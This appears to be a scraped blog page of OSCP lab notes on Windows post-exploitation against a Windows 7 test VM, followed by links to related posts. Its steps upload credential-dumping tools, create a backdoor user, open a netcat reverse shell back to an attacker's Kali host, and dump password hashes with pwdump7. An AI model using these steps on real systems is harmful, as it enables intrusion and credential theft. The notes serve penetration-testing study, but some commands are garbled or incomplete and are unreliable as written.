Windows Post Exploitation

Target Server: IE8-Win 7 VM

1. Download and upload the fgdump, PwDump7, wce and netcat into the IEUser folder on Windows 7.

2.Create the new user hackme with the password "password".

3.Locate fgdump and wce on Kali Linux. We can upload them to Win7 through FTP, wget, HTTP etc.

4.Estalish nc connection between Kali Linux and Windows 7.

Kali Linux

nc -nvlp

Windows 7

-nv 10.0.0.109  -e cmd.exe

We are connected now.

5.Execute the pwdump7 throuth Kali Linux.Then copy and save the result as windows file on the Desktop.

pwdump7

Show the routing table and try to find something interesting.

route print

Show the physical address and try to find something interesting.

arp -a

Show the active connections and try to find something interesting.

netstat -ano

Try to find more inreteting things as more as possible....

Post Exploitation Guide:

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

OSCP Learning Notes - Post Exploitation(2)的更多相关文章

  1. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  2. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  3. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  4. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  5. OSCP Learning Notes - WebApp Exploitation(4)

    Local File Inclusion[LFI] Target Pentester Lab: Download from the following website: https://www.vul ...

  6. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  7. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  8. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. 深入理解Java虚拟机学习笔记(三)-----类文件结构/虚拟机类加载机制

    第6章 类文件结构 1. 无关性 各种不同平台的虚拟机与所有平台都统一使用的程序存储格式——字节码(即扩展名为 .class 的文件) 是构成平台无关性的基石. 字节码(即扩展名为 .class 的文 ...

  2. ubuntu 显示桌面快捷键

    ubuntu 显示桌面快捷键 快速显示桌面的快捷键是 ctrl + win + d win:就是窗口键,在键盘左侧ctrl与Alt之间的那个建.

  3. springboot 2.X 集成redis

    在实际开发中,经常会引入redis中间件做缓存,这里介绍springboot2.X后如何配置redis 1 Maven中引入redis springboot官方通过spring-boot-autoco ...

  4. Flutter学习笔记(36)--常用内置动画

    如需转载,请注明出处:Flutter学习笔记(36)--常用内置动画 Flutter给我们提供了很多而且很好用的内置动画,这些动画仅仅需要简单的几行代码就可以实现一些不错的效果,Flutter的动画分 ...

  5. Spring系列.SpEL表达式

    Spring表达式语言 SpEL语言是一种强大的表达式语言,支持在运行时查询和操作对象.SpEL表达式不一定要创建IOC容器后才能使用.用户完全可以单独调用SpEL的API来独立的使用时SpEL表达式 ...

  6. IDEA中Maven依赖报红处理

    一般依赖报红有以下几种原因: 1.setting.xml没有配置好(要配置自行百度) 2.IDEA配置的Local respository和User settings file路径没写对(不要说不会写 ...

  7. js语法基础入门(2)

    2.变量 2.1.变量的声明 声明变量的时候没有赋值,默认输出undefined //通过var 声明一个变量 var user: //默认输出undefined 可以同时声明多个变量 var use ...

  8. 关于 charset 的几种编码方式

    经常遇到charset=gb2312.charset=iso-8859-1.charset=utf-8这几种编码方式,它们有什么不同,看下面的图 编码方式 含义 charset=iso-8859-1 ...

  9. 【总结】LINQ查询基本操作列表

    每个LINQ查询都以from子句开始,from子句包括以下两个功能. 指定查询将采用数据源. 定义一个本地变量,表示数据源中单个元素. string[] values = { "中国&quo ...

  10. 【vue】---- ElementUI 实现上传Excel

    1.功能描述:vue 项目使用 el-upload 实现上传 Excel. 2.功能效果:在el-upload基础上做了样式整改. 3.功能实现: // el-upload 上传组件 <temp ...